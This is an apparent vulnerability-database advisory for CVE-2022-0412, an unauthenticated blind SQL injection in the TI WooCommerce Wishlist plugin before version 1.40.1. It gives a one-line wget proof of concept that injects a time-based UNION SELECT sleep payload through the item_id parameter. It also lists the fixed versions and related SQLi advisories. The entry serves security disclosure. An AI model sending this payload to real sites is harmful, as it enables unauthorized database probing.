TI WooCommerce Wishlist < 1.40.1 – Unauthenticated Blind SQL Injection | CVE 2022-0412 | Plugin Vulnerabilities

Description

The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks

Proof of Concept

time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g'

Even though it will produce an error 400, the payload is processed and response delayed

Affects Plugins

ti-woocommerce-wishlist

Fixed in 1.40.1

ti-woocommerce-wishlist-premium

Fixed in 1.40.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2668899

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

e984ba11-abeb-4ed4-9dad-0bfd539a9682

Timeline

Publicly Published

2022-01-31 (about 2 years ago)

Added

2022-01-31 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2020-11-02

Title

WP Activity Log < 4.1.5 - SQL Injection in External Database Module

Published

2017-05-02

Title

Calendar by WD < 1.5.52 - Admin+ SQL injection

Published

2019-08-12

Title

Give <= 2.5.0 - SQL Injection

Published

2021-03-26

Title

Quiz And Survey Master < 7.1.12 - Authenticated SQL injection via shortcode

Published

2022-11-14

Title

Comic Book Management System < 2.2.0 - Admin+ SQLi